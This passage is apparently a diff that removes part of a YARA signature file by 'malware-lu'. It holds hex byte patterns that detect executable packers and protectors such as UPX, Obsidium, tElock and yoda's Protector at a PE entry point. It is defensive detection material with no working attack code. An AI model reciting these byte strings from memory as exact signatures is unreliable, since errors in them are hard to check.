-		$a0 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 }
-	$a1 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 C3 B9 08 00 00 00 E8 01 00 00 00 C3 33 C0 E8 E1 FF FF FF 13 C0 E2 F7 C3 33 C9 41 E8 D4 FF FF FF 13 C9 E8 CD FF FF FF 72 F2 C3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PENinjav10DzAkRAkerTNT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 5B 2A 40 00 BF 35 12 00 00 E8 40 12 00 00 3D 22 83 A3 C6 0F 85 67 0F 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallEmbedded19XJitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 ?? ?? ?? ?? 50 E8 87 FC FF FF 59 59 A1 ?? ?? ?? ?? 8B 40 10 03 05 ?? ?? ?? ?? 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptorv13045
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 }
-	$a1 = { E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Obsidium1338ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPV073betaap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2E 72 6C 70 00 00 00 00 00 50 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 E0 }
-
-condition:
-		$a0
-}
-	
-	
-rule yCv13byAshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC C0 00 00 00 53 56 57 8D BD 40 FF FF FF B9 30 00 00 00 B8 CC CC CC CC F3 AB 60 E8 00 00 00 00 5D 81 ED 84 52 41 00 B9 75 5E 41 00 81 E9 DE 52 41 00 8B D5 81 C2 DE 52 41 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC }
-
-condition:
-		$a0
-}
-	
-	
-rule PCPECalphapreview
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AlexProtectorv10Alex
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Shrinkv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 9C FC BE ?? ?? BF ?? ?? 57 B9 ?? ?? F3 A4 8B ?? ?? ?? BE ?? ?? BF ?? ?? F3 A4 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHPack01FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 68 54 ?? ?? 00 B8 48 ?? ?? 00 FF 10 68 B3 ?? ?? 00 50 B8 44 ?? ?? 00 FF 10 68 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SentinelSuperProAutomaticProtectionv640Safenet
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? 6A 01 6A 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C9 3D B7 00 00 00 A1 ?? ?? ?? ?? 0F 94 C1 85 C0 89 0D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 55 56 C7 05 ?? ?? ?? ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 15 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DxPack10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 8B FD 81 ED ?? ?? ?? ?? 2B B9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Pohernah103byKas
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 2A 27 40 00 31 C0 40 83 F0 06 40 3D 40 1F 00 00 75 07 BE 6A 27 40 00 EB 02 EB EB 8B 85 9E 28 40 00 83 F8 01 75 17 31 C0 01 EE 3D 99 00 00 00 74 0C 8B 8D 86 28 40 00 30 0E 40 46 EB ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ObsidiumV1258ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 ?? E8 ?? 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule nPackv11150200BetaNEOx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? 00 E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PerlApp602ActiveState
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 2C EA 40 00 FF D3 83 C4 0C 85 C0 0F 85 CD 00 00 00 6A 09 57 68 20 EA 40 00 FF D3 83 C4 0C 85 C0 75 12 8D 47 09 50 FF 15 1C D1 40 00 59 A3 B8 07 41 00 EB 55 6A 08 57 68 14 EA 40 00 FF D3 83 C4 0C 85 C0 75 11 8D 47 08 50 FF 15 1C D1 40 00 59 89 44 24 10 EB 33 6A 09 57 68 08 EA 40 00 FF D3 83 C4 0C 85 C0 74 22 6A 08 57 68 FC E9 40 00 FF D3 83 C4 0C 85 C0 74 11 6A 0B 57 68 F0 E9 40 00 FF D3 83 C4 0C 85 C0 75 55 }
-	$a1 = { 68 9C E1 40 00 FF 15 A4 D0 40 00 85 C0 59 74 0F 50 FF 15 1C D1 40 00 85 C0 59 89 45 FC 75 62 6A 00 8D 45 F8 FF 75 0C F6 45 14 01 50 8D 45 14 50 E8 9B 01 00 00 83 C4 10 85 C0 0F 84 E9 00 00 00 8B 45 F8 83 C0 14 50 FF D6 85 C0 59 89 45 FC 75 0E FF 75 14 FF 15 78 D0 40 00 E9 C9 00 00 00 68 8C E1 40 00 FF 75 14 50 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule UPXProtectorv10x2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }
-
-condition:
-		$a0
-}
-	
-	
-rule ThinstallEmbedded2501Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D A8 1A 00 00 B9 6D 1A 00 00 BA 21 1B 00 00 BE 00 10 00 00 BF C0 53 00 00 BD F0 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CodeVirtualizer1310OreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C FC E8 00 00 00 00 5F 81 EF ?? ?? ?? ?? 8B C7 81 C7 ?? ?? ?? ?? 3B 47 2C 75 02 EB 2E 89 47 2C B9 A7 00 00 00 EB 05 01 44 8F ?? 49 0B C9 75 F7 83 7F 40 00 74 15 8B 77 40 03 F0 EB 09 8B 1E 03 D8 01 03 83 C6 04 83 3E 00 75 F2 8B 74 24 24 8B DE 03 F0 B9 01 00 00 00 33 C0 F0 0F B1 4F 30 75 F7 AC }
-
-condition:
-		$a0
-}
-	
-	
-rule VProtector13Xvcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 60 8B B4 24 24 00 00 00 8B BC 24 28 00 00 00 FC C6 C2 80 33 DB A4 C6 C3 02 E8 A9 00 00 00 0F 83 F1 FF FF FF 33 C9 E8 9C 00 00 00 0F 83 2D 00 00 00 33 C0 E8 8F 00 00 00 0F 83 37 00 00 00 C6 C3 02 41 C6 C0 10 E8 7D 00 00 00 10 C0 0F 83 F3 FF FF FF }
-	$a1 = { E9 B9 16 00 00 55 8B EC 81 EC 74 04 00 00 57 68 00 00 00 00 68 00 00 C2 14 68 FF FF 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 00 00 C2 10 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 FF FF C2 10 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 00 00 C2 14 68 FF FF 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule Packman0001bubba
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 58 8D A8 ?? FE FF FF 8D 98 ?? ?? ?? FF 8D ?? ?? 01 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimplePackV11XV12XMethod1bagie
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5B 8D 5B FA BD ?? ?? ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEEncryptv40bJunkCode
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 66 ?? ?? 00 66 83 ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEQuake006forgat
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 A5 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A ?? ?? 00 5B ?? ?? 00 6E ?? ?? 00 00 00 00 00 6B 45 72 4E 65 4C 33 32 2E 64 4C 6C 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 ?? ?? 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule Kryptonv02
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 0C 24 E9 0A 7C 01 ?? AD 42 40 BD BE 9D 7A 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakePELockNT204FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 EB 03 CD 20 EB EB 01 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressorPacK150XCGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 83 A5 ?? ?? ?? ?? ?? F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 35 2E 00 83 7D 0C ?? 75 23 8B 45 08 A3 ?? ?? ?? ?? 6A 04 68 00 10 00 00 68 20 03 00 00 6A 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? EB 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule D1S1Gv11BetaScrambledEXED1N
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 07 00 00 00 E8 1E 00 00 00 C3 90 58 89 C2 89 C2 25 00 F0 FF FF 50 83 C0 55 8D 00 FF 30 8D 40 04 FF 30 52 C3 8D 40 00 55 8B EC 83 C4 E8 53 56 57 8B 4D 10 8B 45 08 89 45 F8 8B 45 0C 89 45 F4 8D 41 61 8B 38 8D 41 65 8B 00 03 C7 89 45 FC 8D 41 69 8B 00 03 C7 8D 51 6D 8B 12 03 D7 83 C1 71 8B 09 03 CF 2B CA 72 0A 41 87 D1 80 31 FF 41 4A 75 F9 89 45 F0 EB 71 8B }
-
-condition:
-		$a0
-}
-	
-	
-rule ReversingLabsProtector074betaAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 00 41 00 E8 01 00 00 00 C3 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ACProtect109gRiscosoftwareInc
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 F9 50 E8 01 00 00 00 7C 58 58 49 50 E8 01 00 00 00 7E 58 58 79 04 66 B9 B8 72 E8 01 00 00 00 7A 83 C4 04 85 C8 EB 01 EB C1 F8 BE 72 03 73 01 74 0F 81 01 00 00 00 F9 EB 01 75 F9 E8 01 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NorthStarPEShrinker13Liuxingping
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressorV13CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeJoinerSmallbuild035GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 51 33 CB 86 C9 59 E8 9E FD FF FF 66 87 DB 6A 00 E8 0C 00 00 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upack020betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPX20030XMarkusOberhumerLaszloMolnarJohnReiser
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }
-
-condition:
-		$a0
-}
-	
-	
-rule WinUpackv039finalByDwingc2005h1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 39 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnnamedScrambler12Bp0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 D8 53 56 57 33 C0 89 45 D8 89 45 DC 89 45 E0 89 45 E4 89 45 E8 B8 70 3A 40 00 E8 C4 EC FF FF 33 C0 55 68 5C 3F 40 00 64 FF 30 64 89 20 E8 C5 D7 FF FF E8 5C F5 FF FF B8 20 65 40 00 33 C9 BA 04 01 00 00 E8 D3 DB FF FF 68 04 01 00 00 68 20 65 40 00 6A 00 FF 15 10 55 40 00 BA 6C 3F 40 00 B8 14 55 40 00 E8 5A F4 FF FF 85 C0 0F 84 1B 04 00 00 BA 18 55 40 00 8B 0D 14 55 40 00 E8 16 D7 FF FF 8B 05 88 61 40 00 8B D0 B8 54 62 40 00 E8 D4 E3 FF FF B8 54 62 40 00 E8 F2 E2 FF FF 8B D0 B8 18 55 40 00 8B 0D 88 61 40 00 E8 E8 D6 FF FF FF 35 34 62 40 00 FF 35 30 62 40 00 FF 35 3C 62 40 00 FF 35 38 62 40 00 8D 55 E8 A1 88 61 40 00 E8 E3 F0 FF FF 8B 55 E8 }
-
-condition:
-		$a0
-}
-	
-	
-rule Upack010012betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 48 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEArmorV07Xhying
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 55 56 81 C5 ?? ?? ?? ?? 55 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule LauncherGeneratorv103
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 00 20 40 00 68 10 20 40 00 6A 00 6A 00 6A 20 6A 00 6A 00 6A 00 68 F0 22 40 00 6A 00 E8 93 00 00 00 85 C0 0F 84 7E 00 00 00 B8 00 00 00 00 3B 05 68 20 40 00 74 13 6A ?? 68 60 23 40 00 68 20 23 40 00 6A 00 E8 83 00 00 00 A1 58 20 40 00 3B 05 6C 20 40 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule yodasProtector102103AshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NakedPacker10byBigBoote
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 FC 0F B6 05 34 ?? ?? ?? 85 C0 75 31 B8 50 ?? ?? ?? 2B 05 04 ?? ?? ?? A3 30 ?? ?? ?? A1 00 ?? ?? ?? 03 05 30 ?? ?? ?? A3 38 ?? ?? ?? E8 9A 00 00 00 A3 50 ?? ?? ?? C6 05 34 ?? ?? ?? 01 83 3D 50 ?? ?? ?? 00 75 07 61 FF 25 38 ?? ?? ?? 61 FF 74 24 04 6A 00 FF 15 44 ?? ?? ?? 50 FF 15 40 ?? ?? ?? C3 FF 74 24 04 6A 00 FF 15 44 ?? ?? ?? 50 FF 15 48 ?? ?? ?? C3 8B 4C 24 04 56 8B 74 24 10 57 85 F6 8B F9 74 0D 8B 54 24 10 8A 02 88 01 }
-
-condition:
-		$a0
-}
-	
-	
-rule tElockv080
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 F9 11 00 00 C3 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01YodasProtector102Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 90 90 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VProtector11Xvcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 00 00 00 EB E6 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMASM32
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Pohernah102byKas
-{
-      meta:
-		author="malware-lu"
-strings:
